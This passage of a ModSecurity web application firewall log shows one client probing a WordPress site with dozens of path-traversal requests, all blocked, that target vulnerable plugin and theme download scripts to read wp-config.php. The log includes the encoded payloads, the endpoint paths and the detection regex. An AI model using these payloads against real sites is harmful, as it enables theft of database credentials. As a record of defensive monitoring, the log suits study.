"7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "ZkeqkQHRq32rr8s-kdzk-AAAAMo"] [Fri May 17 14:05:56.413979 2024] [:error] [pid 8308:tid 140325515396864] [client 82.102.26.62:33738] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "ZkeqlCiHs15nDF7H6GoAfAAAAI4"] [Fri May 17 14:05:58.181575 2024] [:error] [pid 8437:tid 140325473433344] [client 82.102.26.62:33744] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "ZkeqlgHRq32rr8s-kdzk-wAAANM"] [Fri May 17 14:06:00.708994 2024] [:error] [pid 8437:tid 140325683148544] [client 82.102.26.62:33752] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZkeqmAHRq32rr8s-kdzk_AAAAMM"] [Fri May 17 14:06:00.848585 2024] [:error] [pid 8308:tid 140325473433344] [client 82.102.26.62:33754] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZkeqmCiHs15nDF7H6GoAfwAAAJM"] [Fri May 17 14:06:12.118758 2024] [:error] [pid 8437:tid 140325439862528] [client 82.102.26.62:33780] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "ZkeqpAHRq32rr8s-kdzlAgAAANc"] [Fri May 17 14:06:14.977217 2024] [:error] [pid 8308:tid 140325557360384] [client 82.102.26.62:33788] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "ZkeqpiiHs15nDF7H6GoAhgAAAIk"] [Fri May 17 14:06:17.621788 2024] [:error] [pid 8308:tid 140325507004160] [client 82.102.26.62:33796] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rttheme18/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rttheme18/download.php"] [unique_id "ZkeqqSiHs15nDF7H6GoAhwAAAI8"] [Fri May 17 14:06:20.248782 2024] [:error] [pid 8306:tid 140325490218752] [client 82.102.26.62:33804] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "ZkeqrGKrj0NgkohKdqGgegAAABE"] [Fri May 17 14:06:21.240839 2024] [:error] [pid 8437:tid 140325657970432] [client 82.102.26.62:33808] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "ZkeqrQHRq32rr8s-kdzlCgAAAMY"] [Fri May 17 14:06:21.384232 2024] [:error] [pid 8308:tid 140325515396864] [client 82.102.26.62:33810] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config-sample.bak"] [unique_id "ZkeqrSiHs15nDF7H6GoAiQAAAI4"] [Fri May 17 14:06:25.072937 2024] [:error] [pid 8307:tid 140325699933952] [client 82.102.26.62:33820] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "ZkeqsRnTegMEbUYrnyHPwAAAAEE"] [Fri May 17 14:06:25.227540 2024] [:error] [pid 8308:tid 140325439862528] [client 82.102.26.62:33822] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZkeqsSiHs15nDF7H6GoAjQAAAJc"] [Fri May 17 14:06:26.185579 2024] [:error] [pid 8308:tid 140325456647936] [client 82.102.26.62:33826] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZkeqsiiHs15nDF7H6GoAjgAAAJU"] [Fri May 17 14:06:28.756755 2024] [:error] [pid 8307:tid 140325657970432] [client 82.102.26.62:33834] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZkeqtBnTegMEbUYrnyHPwQAAAEY"] [Fri May 17 14:06:28.900093 2024] [:error] [pid 8306:tid 140325431469824] [client 82.102.26.62:33836] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZkeqtGKrj0NgkohKdqGgewAAABg"] [Fri May 17 14:06:29.035332 2024] [:error] [pid 8437:tid 140325708326656] [client 82.102.26.62:33838] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hello-elementor/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hello-elementor/down.php"] [unique_id "ZkeqtQHRq32rr8s-kdzlDgAAAMA"] [Fri May 17 14:06:29.993291 2024] [:error] [pid 8307:tid 140325473433344] [client 82.102.26.62:33842] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZkeqtRnTegMEbUYrnyHPwgAAAFM"] [Fri May 17 14:06:30.145993 2024] [:error] [pid 8307:tid 140325574145792] [client 82.102.26.62:33844] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZkeqthnTegMEbUYrnyHPwwAAAEc"] [Fri May 17 14:06:33.144725 2024] [:error] [pid 8437:tid 140325548967680] [client 82.102.26.62:33852] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "ZkequQHRq32rr8s-kdzlEgAAAMo"] [Fri May 17 14:06:33.360352 2024] [:error] [pid 8437:tid 140325674755840] [client 82.102.26.62:33854] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZkequQHRq32rr8s-kdzlEwAAAMQ"] [Fri May 17 14:06:36.467558 2024] [:error] [pid 8437:tid 140325473433344] [client 82.102.26.62:33862] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZkeqvAHRq32rr8s-kdzlFQAAANM"] [Fri May 17 14:06:37.553592 2024] [:error] [pid 8437:tid 140325448255232] [client 82.102.26.62:33866] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "ZkeqvQHRq32rr8s-kdzlFwAAANY"] [Fri May 17 14:06:37.691755 